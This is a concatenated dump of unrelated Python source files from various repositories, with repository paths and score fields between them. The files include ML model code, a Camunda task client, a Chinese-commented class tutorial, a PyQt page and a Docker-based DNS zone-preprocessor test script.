MAX_SIM_TIME_kernel = 100000 # usually infects very quickly, so a large number can be chosen
sim_dir = "Simulations"
ext = ["py", "pyx"]
gens_to_sim = ["nasal","0","5","10","15"]
param_csv = "lung_parameters.csv"
param_df = pd.read_csv(param_csv, sep = "\t")
param_df = param_df[param_df["Generation"].isin(gens_to_sim)]
lung = LungParam(param_csv)
for par in range(len(param_df)):
v_adv = param_df.iloc[par]["Advection (mm/min)"]*1000/60 # mm/min -> um/s
MUCUS_THICKNESS = 0.5*(param_df.iloc[par]["ASL Height (lower, um)"] + param_df.iloc[par]["ASL Height (upper, um)"])
gen = param_df.iloc[par]["Generation"]
sim_num = write_sim_folder(sim_dir, ext)
sim_folder = os.path.join(sim_dir, sim_num)
sim = Simulation(Dv, PCL_THICKNESS, MUCUS_THICKNESS, CELL_DIAM, CIRCUM, \
infection_prob, NUM_VIRUS, v_adv, infectible_perc, MEMORY_CUTOFF, MAX_SIM_TIME_kernel, \
virions_per_day, num_days, latency_time, virus_at_interface, gen, restrict_to_gen, lung)
FullModel(sim, sim_folder)
if __name__ == "__main__":
main()
| 2.03125 | 2 |
mne/datasets/mtrf/mtrf.py | fmamashli/mne-python | 1 | 12757388 | # Authors: <NAME> <<EMAIL>>
#
# License: BSD Style.
from functools import partial
from ...utils import verbose
from ..utils import (has_dataset, _data_path, _data_path_doc,
_get_version, _version_doc)
data_name = 'mtrf'
has_mtrf_data = partial(has_dataset, name=data_name)
@verbose
def data_path(path=None, force_update=False, update_path=True, download=True,
verbose=None): # noqa: D103
return _data_path(path=path, force_update=force_update,
update_path=update_path, name=data_name,
download=download)
data_path.__doc__ = _data_path_doc.format(name=data_name,
conf='MNE_DATASETS_MTRF_PATH')
def get_version(): # noqa: D103
return _get_version(data_name)
get_version.__doc__ = _version_doc.format(name=data_name)
| 1.757813 | 2 |
teamgen/stats.py | sharpertool/teamgen | 0 | 12757389 | import logging
from typing import List
import math
import itertools
logger = logging.getLogger(__name__)
class RoundStats:
def __init__(self):
self._diff_history = []
self._q_history = []
def push_histories(self, diff=None, q=None):
if diff: self._diff_history.append(diff)
if q: self._q_history.append(q)
@property
def diff_history(self):
return self._diff_history or [-1]
@property
def q_history(self):
return self._q_history or [-1]
def get_stats(self):
max_diff = 0.0
min_diff = 1000.0
maxq = 100.0
minq = -1.0
dh = self._diff_history
qh = self._q_history
if dh:
max_diff = max(dh)
min_diff = min(dh)
if qh:
maxq = max(qh)
minq = min(qh)
return max_diff, min_diff, minq, maxq
@property
def min_diff(self):
if self._diff_history:
return min(self._diff_history)
return 1000
@property
def max_q(self):
if self._q_history:
return max(self._q_history)
@property
def min_q(self):
if self._q_history:
return min(self._q_history)
@staticmethod
def print_check_stats():
print('')
def __str__(self):
return " ".join([str(m) for m in self.matches])
def __repr__(self):
return str(self)
| 3.09375 | 3 |
dataloaders/toy.py | StijnVerdenius/Leren-Beslsissen-Help-Classes | 0 | 12757390 | import random
import numpy as np
import torch
from torch.utils import data
from torch.utils.data.dataset import Dataset
"""
Example of how to make your own dataset
"""
class ToyDataSet(Dataset):
"""
class that defines what a data-sample looks like
In the __init__ you could for example load in the data from file
and then return specific items in __getitem__
and return the length in __len__
"""
def __init__(self, length: int):
""" loads all stuff relevant for dataset """
# save the length, usually depends on data-file but here data is generated instead
self.length = length
# generate random binary labels
self.classes = [random.choice([0, 1]) for _ in range(length)]
# generate data from those labels
self.data = [np.random.normal(self.classes[i], 0.2, 2) for i in range(length)]
def __getitem__(self, item_index):
""" defines how to get one sample """
class_ = torch.tensor(self.classes[item_index]) # python scalar to torch tensor
tensor = torch.from_numpy(self.data[item_index]) # numpy array/tensor to torch array/tensor
return tensor, class_
def __len__(self):
""" defines how many samples in an epoch, independently of batch size"""
return self.length
def get_toy_loaders(length: int, batch_size: int):
""" converts a dataset to a batched dataloader """
train_loader = torch.utils.data.DataLoader(
ToyDataSet(int(length * 0.8)),
batch_size=batch_size,
shuffle=True,
pin_memory=True,
)
test_loader = torch.utils.data.DataLoader(
ToyDataSet(int(length * 0.2)),
batch_size=batch_size,
shuffle=True,
pin_memory=True,
)
return train_loader, test_loader
| 3.546875 | 4 |
sort/CountingSort.py | LeonKennedy/DataStructureAlgorithm | 0 | 12757391 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Filename: CountingSort.py
# @Author: olenji - <EMAIL>
# @Description: 适用于K比较少的情况
# @Create: 2019-06-13 20:47
# @Last Modified: 2019-06-13 20:47
import array
import random
class CountingSort:
def counting_sort(self, data, n):
c = array.array('l', [0] * n)
for d in data:
c[d] += 1
temp = 0
for i in range(n):
c[i] += temp
temp = c[i]
output = array.array('l', [20] * len(data))
for d in data:
index = c[d] - 1
c[d] -= 1
output[index] = d
return output
def test():
max = 20
a = [random.randint(0, max - 1) for _ in range(100)]
data = array.array('l', a)
print(data)
bs = CountingSort()
data = bs.counting_sort(data, n=max)
print(data)
if __name__ == "__main__":
test()
| 3.890625 | 4 |
models/densenetBC.py | MLI-lab/candidate_training | 2 | 12757392 | '''DenseNet-BC-100 k=12 adopted from https://github.com/hysts/pytorch_image_classification'''
import torch
import torch.nn as nn
import torch.nn.functional as F
def initialize_weights(m):
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight.data, mode='fan_out')
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.bias.data.zero_()
class BasicBlock(nn.Module):
def __init__(self, in_channels, out_channels, drop_rate):
super(BasicBlock, self).__init__()
self.drop_rate = drop_rate
self.bn = nn.BatchNorm2d(in_channels)
self.conv = nn.Conv2d(
in_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=False)
def forward(self, x):
y = self.conv(F.relu(self.bn(x), inplace=True))
if self.drop_rate > 0:
y = F.dropout(
y, p=self.drop_rate, training=self.training, inplace=False)
return torch.cat([x, y], dim=1)
class BottleneckBlock(nn.Module):
def __init__(self, in_channels, out_channels, drop_rate):
super(BottleneckBlock, self).__init__()
self.drop_rate = drop_rate
bottleneck_channels = out_channels * 4
self.bn1 = nn.BatchNorm2d(in_channels)
self.conv1 = nn.Conv2d(
in_channels,
bottleneck_channels,
kernel_size=1,
stride=1,
padding=0,
bias=False)
self.bn2 = nn.BatchNorm2d(bottleneck_channels)
self.conv2 = nn.Conv2d(
bottleneck_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=False)
def forward(self, x):
y = self.conv1(F.relu(self.bn1(x), inplace=True))
if self.drop_rate > 0:
y = F.dropout(
y, p=self.drop_rate, training=self.training, inplace=False)
y = self.conv2(F.relu(self.bn2(y), inplace=True))
if self.drop_rate > 0:
y = F.dropout(
y, p=self.drop_rate, training=self.training, inplace=False)
return torch.cat([x, y], dim=1)
class TransitionBlock(nn.Module):
def __init__(self, in_channels, out_channels, drop_rate):
super(TransitionBlock, self).__init__()
self.drop_rate = drop_rate
self.bn = nn.BatchNorm2d(in_channels)
self.conv = nn.Conv2d(
in_channels,
out_channels,
kernel_size=1,
stride=1,
padding=0,
bias=False)
def forward(self, x):
x = self.conv(F.relu(self.bn(x), inplace=True))
if self.drop_rate > 0:
x = F.dropout(
x, p=self.drop_rate, training=self.training, inplace=False)
x = F.avg_pool2d(x, kernel_size=2, stride=2)
return x
class Network(nn.Module):
def __init__(self):
super(Network, self).__init__()
input_shape = (1, 3, 32, 32)
n_classes = 10
block_type = 'bottleneck'
depth = 100
self.growth_rate = 12
self.drop_rate = 0
self.compression_rate = 0.5
assert block_type in ['basic', 'bottleneck']
if block_type == 'basic':
block = BasicBlock
n_blocks_per_stage = (depth - 4) // 3
assert n_blocks_per_stage * 3 + 4 == depth
else:
block = BottleneckBlock
n_blocks_per_stage = (depth - 4) // 6
assert n_blocks_per_stage * 6 + 4 == depth
in_channels = [2 * self.growth_rate]
for index in range(3):
denseblock_out_channels = int(
in_channels[-1] + n_blocks_per_stage * self.growth_rate)
if index < 2:
transitionblock_out_channels = int(
denseblock_out_channels * self.compression_rate)
else:
transitionblock_out_channels = denseblock_out_channels
in_channels.append(transitionblock_out_channels)
self.conv = nn.Conv2d(
input_shape[1],
in_channels[0],
kernel_size=3,
stride=1,
padding=1,
bias=False)
self.stage1 = self._make_stage(in_channels[0], n_blocks_per_stage,
block, True)
self.stage2 = self._make_stage(in_channels[1], n_blocks_per_stage,
block, True)
self.stage3 = self._make_stage(in_channels[2], n_blocks_per_stage,
block, False)
self.bn = nn.BatchNorm2d(in_channels[3])
# compute conv feature size
with torch.no_grad():
self.feature_size = self._forward_conv(
torch.zeros(*input_shape)).view(-1).shape[0]
self.fc = nn.Linear(self.feature_size, n_classes)
# initialize weights
self.apply(initialize_weights)
def _make_stage(self, in_channels, n_blocks, block, add_transition_block):
stage = nn.Sequential()
for index in range(n_blocks):
stage.add_module(
'block{}'.format(index + 1),
block(in_channels + index * self.growth_rate, self.growth_rate,
self.drop_rate))
if add_transition_block:
in_channels = int(in_channels + n_blocks * self.growth_rate)
out_channels = int(in_channels * self.compression_rate)
stage.add_module(
'transition',
TransitionBlock(in_channels, out_channels, self.drop_rate))
return stage
def _forward_conv(self, x):
x = self.conv(x)
x = self.stage1(x)
x = self.stage2(x)
x = self.stage3(x)
x = F.relu(self.bn(x), inplace=True)
x = F.adaptive_avg_pool2d(x, output_size=1)
return x
def forward(self, x):
x = self._forward_conv(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
| 2.734375 | 3 |
lib/node/utils.py | AnonymouzAuthorz/RevisitingTabularDL | 298 | 12757393 | <reponame>AnonymouzAuthorz/RevisitingTabularDL<gh_stars>100-1000
# Source: https://github.com/Qwicen/node
import contextlib
import gc
import glob
import hashlib
import os
import time
import numpy as np
import requests
import torch
from tqdm import tqdm
def download(url, filename, delete_if_interrupted=True, chunk_size=4096):
""" saves file from url to filename with a fancy progressbar """
try:
with open(filename, "wb") as f:
print("Downloading {} > {}".format(url, filename))
response = requests.get(url, stream=True)
total_length = response.headers.get('content-length')
if total_length is None: # no content length header
f.write(response.content)
else:
total_length = int(total_length)
with tqdm(total=total_length) as progressbar:
for data in response.iter_content(chunk_size=chunk_size):
if data: # filter-out keep-alive chunks
f.write(data)
progressbar.update(len(data))
except Exception as e:
if delete_if_interrupted:
print("Removing incomplete download {}.".format(filename))
os.remove(filename)
raise e
return filename
def iterate_minibatches(*tensors, batch_size, shuffle=True, epochs=1,
allow_incomplete=True, callback=lambda x:x):
indices = np.arange(len(tensors[0]))
upper_bound = int((np.ceil if allow_incomplete else np.floor) (len(indices) / batch_size)) * batch_size
epoch = 0
while True:
if shuffle:
np.random.shuffle(indices)
for batch_start in callback(range(0, upper_bound, batch_size)):
batch_ix = indices[batch_start: batch_start + batch_size]
batch = [tensor[batch_ix] for tensor in tensors]
yield batch if len(tensors) > 1 else batch[0]
epoch += 1
if epoch >= epochs:
break
def process_in_chunks(function, *args, batch_size, out=None, **kwargs):
"""
Computes output by applying batch-parallel function to large data tensor in chunks
:param function: a function(*[x[indices, ...] for x in args]) -> out[indices, ...]
:param args: one or many tensors, each [num_instances, ...]
:param batch_size: maximum chunk size processed in one go
:param out: memory buffer for out, defaults to torch.zeros of appropriate size and type
:returns: function(data), computed in a memory-efficient way
"""
total_size = args[0].shape[0]
first_output = function(*[x[0: batch_size] for x in args])
output_shape = (total_size,) + tuple(first_output.shape[1:])
if out is None:
out = torch.zeros(*output_shape, dtype=first_output.dtype, device=first_output.device,
layout=first_output.layout, **kwargs)
out[0: batch_size] = first_output
for i in range(batch_size, total_size, batch_size):
batch_ix = slice(i, min(i + batch_size, total_size))
out[batch_ix] = function(*[x[batch_ix] for x in args])
return out
def check_numpy(x):
""" Makes sure x is a numpy array """
if isinstance(x, torch.Tensor):
x = x.detach().cpu().numpy()
x = np.asarray(x)
assert isinstance(x, np.ndarray)
return x
@contextlib.contextmanager
def nop_ctx():
yield None
def get_latest_file(pattern):
list_of_files = glob.glob(pattern) # * means all if need specific format then *.csv
assert len(list_of_files) > 0, "No files found: " + pattern
return max(list_of_files, key=os.path.getctime)
def md5sum(fname):
""" Computes mdp checksum of a file """
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def free_memory(sleep_time=0.1):
""" Black magic function to free torch memory and some jupyter whims """
gc.collect()
torch.cuda.synchronize()
gc.collect()
torch.cuda.empty_cache()
time.sleep(sleep_time)
def to_float_str(element):
try:
return str(float(element))
except ValueError:
return element
| 2.359375 | 2 |
python/test/mx_test.py | ahmedezzat85/SNPX_ML | 0 | 12757394 | from snpx.snpx_mxnet import SNPXClassifier
import os
LOGS = os.path.join(os.path.dirname(__file__), "..", "log")
MODEL = os.path.join(os.path.dirname(__file__), "..", "model")
classif = SNPXClassifier("mini_vgg", "CIFAR-10", devices=['GPU'],logs_root=LOGS, model_bin_root=MODEL)
classif.train(1)
| 2.015625 | 2 |
ida-service/src/camunda_external_task.py | NovatecConsulting/intelligent-process-automation-showcase | 2 | 12757395 | <reponame>NovatecConsulting/intelligent-process-automation-showcase
import requests
import json
import logging
import time
import uuid
class client:
def __init__(self, url, workerid = "defaultid", processInstanceId = ""):
self.url = url
self.workerid = workerid
self.processInstanceId = processInstanceId
logging.basicConfig(level=logging.INFO)
def subscribe(self, topic, lockDuration = 1000, longPolling = 5000):
# Define the endpoint for fetch and lock
endpoint = str(self.url) +"/external-task/fetchAndLock"
# Define unique ID for the worker
# global uid
# uid = uuid.uuid1()
# uid = str(uid)
workerid = str(self.workerid)
#Define the Json for the Request
task= {"workerId": workerid,
"maxTasks":1,
"usePriority":"true",
"asyncResponseTimeout": longPolling,
"topics":
[{"topicName": topic,
"lockDuration": lockDuration
}]
}
#Make the request
global engine
engine = True
try:
fetch_and_lock = requests.post(endpoint, json=task)
logging.info(fetch_and_lock.status_code)
global body
body = fetch_and_lock.text
logging.info("body: {}".format(body))
except Exception as err:
engine = False
logging.info("An error occurred during connection to external task".format(err))
if(engine == True):
while body == '[]':
logging.info("Polling Camunda for External Task")
fetch_and_lock = requests.post(endpoint, json=task)
body = fetch_and_lock.text
time.sleep(5)
if body != '[]':
self.processInstanceId = json.loads(body)[0]["processInstanceId"]
break
#Complete Call
def complete(self, **kwargs):
response_body = json.loads(body)
taskid = response_body[0]['id']
taskid = str(taskid)
endpoint = str(self.url) + "/external-task/" + taskid + "/complete"
#get workerid
workerid = response_body[0]['workerId']
workerid = str(workerid)
#puts the variables from the dictonary into the nested format for the json response
variables_for_response = {}
for key, val in kwargs.items():
variable_new = {key:{"value": val}}
variables_for_response.update(variable_new)
response= {"workerId": workerid,
"variables": variables_for_response
}
try:
complete = requests.post(endpoint, json =response)
body_complete = complete.text
logging.info(body_complete)
logging.info(complete.status_code)
except:
logging.info('Completing external task failed')
#BPMN Error
def error(self, bpmn_error, error_message = "not defined", **kwargs):
response_body = json.loads(body)
taskid = response_body[0]['id']
taskid = str(taskid)
endpoint = str(self.url) + "/external-task/"+ taskid + "/bpmnError"
workerid = response_body[0]['workerId']
workerid = str(workerid)
variables_for_response = {}
for key, val in kwargs.items():
variable_new = {key:{"value": val}}
variables_for_response.update(variable_new)
response = {
"workerId": workerid,
"errorCode": bpmn_error,
"errorMessage": error_message,
"variables": variables_for_response
}
try:
error = requests.post(endpoint, json = response)
logging.info(error.status_code)
except:
logging.info('fail')
#Create an incident
def fail(self, error_message, retries = 0, retry_timeout= 0):
response_body = json.loads(body)
taskid = response_body[0]['id']
taskid = str(taskid)
endpoint = str(self.url) + "/external-task/"+ taskid + "/failure"
workerid = response_body[0]['workerId']
workerid = str(workerid)
response = {
"workerId": workerid,
"errorMessage": error_message,
"retries": retries,
"retryTimeout": retry_timeout}
try:
fail = requests.post(endpoint, json = response)
logging.info(fail.status_code)
except:
logging.info('fail')
# New Lockduration
def new_lockduration(self, new_duration):
response_body = json.loads(body)
taskid = response_body[0]['id']
taskid = str(taskid)
endpoint = str(self.url) + "/external-task/"+ taskid + "/extendLock"
workerid = response_body[0]['workerId']
workerid = str(workerid)
response = {
"workerId": workerid,
"newDuration": new_duration
}
try:
newDuration = requests.post(endpoint, json = response)
logging.info(newDuration.status_code)
logging.info(workerid)
except:
logging.info('fail')
| 2.21875 | 2 |
03-Coroutines/22-Fibonacci.py | ericson14/Small_project | 0 | 12757396 | class FibIterator(object):
def __init__(self, n):
self.n = n
self.current = 0
self.num1 = 0
self.num2 = 1
def __next__(self):
if self.current < self.n:
item = self.num1
self.num1, self.num2 = self.num2, self.num1+self.num2
self.current += 1
return item
else:
raise StopIteration
def __iter__(self):
return self
if __name__ == '__main__':
fib = FibIterator(20)
for num in fib:
print(num, end=" ")
print("\n", list(FibIterator(10)))
| 3.859375 | 4 |
class/class_0.py | sixiaozheng/PythonCodebase | 2 | 12757397 | <reponame>sixiaozheng/PythonCodebase<gh_stars>1-10
"""
类和对象
python 支持面向对象的三大特征:封装、继承和多态
子类继承父类同样可以继承到父类的变量和方法
类中各成员之间的定义顺序没有任何影响,各成员之间可以相互调用。
类变量:属于类本身,定义类本身的状态数据
实例变量:属于对象本身,定义对象包含的状态数据
方法:定义该类的对象的行为或功能实现
python是动态语言,所以类变量,实例变量,方法可以动态增加或删除。
可以在类体中(类变量)或任何地方位新变量赋值来增加变量,
通过del语句删除变量。
创建对象后,对象的作用:
操作对象的实例变量(访问实例变量的值、修改实例变量、添加实例变量、删除实例变量)
调用对象的方法
"""
################################################################
class Person:
"""
类的说明文档
"""
# 类变量
hair = 'black'
# self 被绑定到构造方法初始化的对象
def __init__(self,name='Charlie',age=8):
# 实例变量
self.name = name
self.age = age
def say(self,content):
print(content)
def speech(self, content):
self.say(content)
p=Person()
# 访问
p.name
print(p.name)
# 修改
p.name="zsx"
print(p.name)
# 增加
p.skills='swimming'
print(p.skills)
# 删除
del p.name
################################################################
# 动态增加方法
def intro_func(self, content):
print(content)
from types import MethodType
p.intro = MethodType(intro_func, p)
p.intro("life in everywhere")
################################################################
# self参数作为对象的默认引用,可以像访问普通变量一样访问这个self参数,
# 也可以把self参数当成实例方法的返回值
# 如果在某个方法中把self参数作为返回值,则可以多次连续调用同一个方法,从而使得代码更加简洁
class ReturnSelf:
def grow(self):
if hasattr(self, 'age'):
self.age+=1
else:
self.age=1
return self
rs = ReturnSelf()
rs.grow().grow().grow().grow().grow()
print(rs.age)
################################################################
# 类方法 静态方法
# 推荐通过类进行调用,也可以使用对象调用
# 类方法会自动绑定类方法的第一个参数,cls会自动绑定类本身
# 静态方法不会自动绑定
# 一般不需要使用类方法或静态方法,程序完全可以使用函数来代替类方法或静态方法。
# 但是在特殊的场景(比如使用工厂模式)下,类方法或静态方法也是不错的选择
class Bird:
@classmethod
def fly(cls):
print('class method', cls)
@staticmethod
def info(p):
print('static method', p)
# 调用类方法,Bird类会自动绑定到第一个参数
Bird.fly()
# 调用静态方法,不会自动绑定,因此程序必须手动绑定第一个参数
Bird.info('crazyit')
b=Bird()
# 使用对象调用fly()类方法,其实依然还是使用类调用的
# 第一个参数依然被自动绑定到 Bird 类
b.fly()
# 使用对象调用 info ()静态方法,其实依然还是使用类调用的
# 因此程序必须为第一个参数执行绑定
b.info('fkit')
################################################################
# @函数装饰器
# 1) 将被修饰的函数(函数 B)作为参数传给@符号引用的函数(函数 A)。
# 2)将函数 B 替换(装饰)成上一步的返回值
# 在被修饰函数之前、之后、抛出异常后增加某种处理逻辑的方式,就是其他编程语言中的 AOP (Aspect Orient Programming,面向切面编程)。
################################################################
# python的类就像命名空间,默认处于全局命名空间内,类体则处于则处于类命名空间内
# 类变量:通过类访问和修改类变量
# 允许使用对象访问类变量,本质依然是通过类名进行访问
# 不能通过对象修改类变量,实际上是定义新的实例变量
################################################################
# @property 修饰方法,使之成为属性
class Cell:
# 使用@property修饰方法, 相当于为该属性设置getter方法
@property
def state(self):
return self._state
# 为 state 属性设置 setter 方法
@state.setter
def state(self, value):
if 'alive' in value.lower():
self._state = 'alive'
else:
self._state = 'dead'
# 为 is_dead 属性设置 getter 方法
# 只有 getter 方法的属性是只读属性
@property
def is_dead(self):
return not self._state.lower()=='alive'
c=Cell()
c.state='Alive'
print(c.state)
print(c.is_dead)
################################################################
# 隐藏
# 为了隐藏类中的成员, Python玩了一个小技巧: 只要将Python类的成员命名为以__开头的,Python就会把它们隐藏起来。
# python 其实没有真正的隐藏机制,双下画线只是Python的一个小技巧: Python会“偷偷”地改变以__开头的方法名,会在这些方法名前添加_和类名
class Test:
def __init__(self, name, age):
self.__name = name
self.__age = age
def __print_info(self):
print(self.__name, self.__age)
# 通过添加 _Test 可以直接访问__开头的成员
t = Test('as', 3)
print(t._Test__name, t._Test__age)
t._Test__print_info()
# 无法直接访问__开头的成员
t = Test('as', 3)
print(t.__name, t.__age)
t.__print_info()
################################################################
# 继承
# 继承的作用一一子类扩展(继承〉了父类, 将可以继承得到父类定义的方法,这样子类就可复用父类的方法了
# 在python不推荐使用多继承
class SubClass(SuperClass1, SuperClass2):
pass
# 重写
# 子类包含与父类同名的方法的现象被称为方法重写( Override),也被称为方法覆盖。
# 可以说子类重写了父类的方法,也可以说子类覆盖了父类的方法。
# 如何调用父类中被重写的方法?
class BaseClass:
def foo(self):
print('父类中定义的 foo方法')
class SubClass(BaseClass):
# 重写父类的 foo方法
def foo(self):
print('子类重写父类中的 foo方法')
def bar(self):
print('执行 bar 方法')
# 直接执行 foo 方法,将会调用子类重写之后的 foo ()方法
self.foo()
# 使用类名调用实例方法〈未绑定方法)调用父类被重写的方法
BaseClass.foo(self)
sc=Subclass()
sc.bar()
# Python要求: 如果子类重写了父类的构造方法,那么子类的构造方法必须调用父类的构造方法
# Manager 继承了 Employee、 Customer
class Manager(Employee, Customer):
#重写父类的构造方法
def __init__(self, salary, favorite, address):
print('一Manager 的构造方法一')
# 通过 super()函数调用父类的构造方法
super().__init__(salary=salary, favorite=favorite, address=address)
# 与上一行代码的效果相同
super(Manager, self).__init__(salary)
# 使用未绑定方法调用父类的构造方法
Customer.__init__(self, favorite, address)
# 创建 Manager 对象
m = Manager(25000, 'IT 产品', '广州')
m.work() #1
m.info() #2 | 3.453125 | 3 |
blackjack-client/view/AboutPage.py | lehoangtran289/Blackjack | 0 | 12757398 | from PyQt5 import QtCore, QtWidgets, QtGui, uic
from utils import configs, Connection
import socket
from view import HomePage
class aboutPage(QtWidgets.QWidget):
def __init__(self, user, connection, x, y):
super().__init__()
uic.loadUi('./ui/about.ui', self)
self.user = user
self.connection = connection
self.back_button.clicked.connect(self.back)
self.close_on_purpose = True
self.contributors.setText(configs.contributors)
self.rules.setText(configs.rules)
self.setWindowTitle('About')
self.setFixedSize(800, 600)
self.setGeometry(x, y, 800, 600)
def closeEvent(self, event):
if self.close_on_purpose == False:
event.accept()
return
reply = QtWidgets.QMessageBox.question(self, 'Quit', 'Are you sure you want to quit?', \
QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No)
if reply == QtWidgets.QMessageBox.Yes:
request = 'LOGOUT ' + self.user.username
self.connection.send(request)
event.accept()
else:
event.ignore()
def back(self):
self.home_page = HomePage.homePage(self.user, self.connection, self.pos().x(), self.pos().y() + 30)
self.close_on_purpose = False
self.close()
self.home_page.show() | 2.703125 | 3 |
DifferentialTesting/Scripts/preprocessor_checks.py | RajdeepMondal/Ferret | 9 | 12757399 | <reponame>RajdeepMondal/Ferret<filename>DifferentialTesting/Scripts/preprocessor_checks.py
"""
Run zone preprocessors on (invalid) zone files
usage: preprocessor_checks.py [-h] [-path DIRECTORY_PATH] [-id {1,2,3,4,5}]
[-b] [-n] [-k] [-p] [-l]
optional arguments:
-h, --help show this help message and exit
-path DIRECTORY_PATH The path to the directory containing ZoneFiles; looks
for ZoneFiles directory recursively(default:
Results/InvalidZoneFileTests/)
-id {1,2,3,4,5} Unique id for all the containers (default: 1)
-b Disable Bind. (default: False)
-n Disable Nsd. (default: False)
-k Disable Knot. (default: False)
-p Disable PowerDns. (default: False)
-l, --latest Test using latest image tag. (default: False)
"""
#!/usr/bin/env python3
from datetime import datetime
import json
import pathlib
import subprocess
import time
import sys
from argparse import SUPPRESS, ArgumentDefaultsHelpFormatter, ArgumentParser, Namespace
from typing import Dict, Tuple
PREPROCESSOR_DIRECTORY = "PreprocessorOutputs/"
def get_ports(input_args: Namespace) -> Dict[str, Tuple[bool, int]]:
"""
Returns a map from an implementation to the host port its container port 53
should be mapped and whether that implementation should be tested.
:param input_args: The input arguments
"""
implementations = {}
implementations['bind'] = (not input_args.b, 8000)
implementations['nsd'] = (not input_args.n, 8100)
implementations['knot'] = (not input_args.k, 8200)
implementations['powerdns'] = (not input_args.p, 8300)
return implementations
def delete_container(container_name: str) -> None:
"""Deletes a container if it is running"""
cmd_status = subprocess.run(
['docker', 'ps', '-a', '--format', '"{{.Names}}"'], stdout=subprocess.PIPE, check=False)
output = cmd_status.stdout.decode("utf-8")
if cmd_status.returncode != 0:
sys.exit(f'Error in executing Docker ps command: {output}')
all_container_names = [name[1:-1] for name in output.strip().split("\n")]
if container_name in all_container_names:
subprocess.run(['docker', 'container', 'rm', '-f', container_name], check=True)
def bind(zone_file: pathlib.Path,
origin: str,
cid: str,
new: bool,
port: int,
tag: str) -> Tuple[int, str]:
"""
Uses a Bind container to check the input zone file with Bind preprocessor named-checkzone.
Returns the preprocessor return code and output.
:param zone_file: The path to the zone file
:param zone_domain: The zone origin
:param cid: The unique id for the container
:param new: Whether to load the input zone file in a new container
or reuse the existing container
:param port: The host port to map to the container port 53
:param tag: Tag of the image to use
"""
if new:
delete_container(f'{cid}_bind_server')
subprocess.run(['docker', 'run', '-dp', str(port * int(cid))+':53/udp',
'--name=' + cid + '_bind_server', 'bind' + tag], check=False)
subprocess.run(['docker', 'cp', zone_file, cid +
'_bind_server:.'], check=False)
compilezone = subprocess.run(['docker', 'exec', cid + '_bind_server', 'named-checkzone', '-i',
'local', '-k', 'ignore', origin, f'{zone_file.name}'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False)
output = compilezone.stdout.decode("utf-8").strip().split('\n')
return (compilezone.returncode, output)
def nsd(zone_file: pathlib.Path,
origin: str,
cid: str,
new: bool,
port: int,
tag: str) -> Tuple[int, str]:
"""
Uses a NSD container to check the input zone file with NSD preprocessor nsd-checkzone.
Returns the preprocessor return code and output.
:param zone_file: The path to the zone file
:param zone_domain: The zone origin
:param cid: The unique id for the container
:param new: Whether to load the input zone file in a new container
or reuse the existing container
:param port: The host port to map to the container port 53
:param tag: Tag of the image to use
"""
if new:
delete_container(f'{cid}_nsd_server')
subprocess.run(['docker', 'run', '-dp', str(port * int(cid))+':53/udp',
'--name=' + cid + '_nsd_server', 'nsd' + tag], check=False)
subprocess.run(['docker', 'cp', zone_file, cid +
'_nsd_server:.'], check=False)
compilezone = subprocess.run(['docker', 'exec', cid + '_nsd_server', 'nsd-checkzone',
origin, f'{zone_file.name}'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False)
output = compilezone.stdout.decode("utf-8").strip().split('\n')
return (compilezone.returncode, output)
def knot(zone_file: pathlib.Path,
origin: str,
cid: str,
new: bool,
port: int,
tag: str) -> Tuple[int, str]:
"""
Uses a Knot container to check the input zone file with Knot preprocessor kcheckzone.
Returns the preprocessor return code and output.
:param zone_file: The path to the zone file
:param zone_domain: The zone origin
:param cid: The unique id for the container
:param new: Whether to load the input zone file in a new container
or reuse the existing container
:param port: The host port to map to the container port 53
:param tag: Tag of the image to use
"""
if new:
delete_container(f'{cid}_knot_server')
subprocess.run(['docker', 'run', '-dp', str(port * int(cid))+':53/udp',
'--name=' + cid + '_knot_server', 'knot' + tag], check=False)
subprocess.run(['docker', 'cp', zone_file, cid +
'_knot_server:.'], check=False)
compilezone = subprocess.run(['docker', 'exec', cid + '_knot_server', 'kzonecheck', '-v', '-o',
origin, f'{zone_file.name}'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False)
output = compilezone.stdout.decode("utf-8").strip().split('\n')
return (compilezone.returncode, output)
def powerdns(zone_file: pathlib.Path,
origin: str,
cid: str,
new: bool,
port: int,
tag: str) -> Tuple[int, str]:
"""
Uses a Powerdns container to check the input zone file with PDNS preprocessor pdnsutil.
Returns the preprocessor return code and output.
:param zone_file: The path to the zone file
:param zone_domain: The zone origin
:param cid: The unique id for the container
:param new: Whether to load the input zone file in a new container
or reuse the existing container
:param port: The host port to map to the container port 53
:param tag: Tag of the image to use
"""
if new:
delete_container(f'{cid}_powerdns_server')
subprocess.run(['docker', 'run', '-dp', str(port * int(cid))+':53/udp',
'--name=' + cid + '_powerdns_server', 'powerdns' + tag], check=False)
subprocess.run(['docker', 'cp', zone_file, cid +
'_powerdns_server:/usr/local/etc/' + origin], check=False)
bindbackend = f'zone "{origin}" {{\n file "/usr/local/etc/{origin}";\n type master;\n}};'
with open('bindbackend'+cid+'.conf', 'w') as file_pointer:
file_pointer.write(bindbackend)
subprocess.run(['docker', 'cp', 'bindbackend'+cid+'.conf',
cid + '_powerdns_server:/usr/local/etc/bindbackend.conf'], check=False)
pathlib.Path('bindbackend'+cid+'.conf').unlink()
subprocess.run(['docker', 'exec', cid + '_powerdns_server',
'dos2unix', '/usr/local/etc/bindbackend.conf'], check=False)
compilezone = subprocess.run(['docker', 'exec', cid + '_powerdns_server', 'pdnsutil', '-v',
'check-zone', f'{origin}'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False)
output = compilezone.stdout.decode("utf-8").strip().split('\n')
return (compilezone.returncode, output)
def check_zone_with_preprocessors(input_args: Namespace,
directory: pathlib.Path,
zone_path: pathlib.Path,
cid: str,
new: bool) -> bool:
"""
Checks a zone file with different input implementations preprocessors.
Returns if the checks were successful.
:param input_args: The input arguments
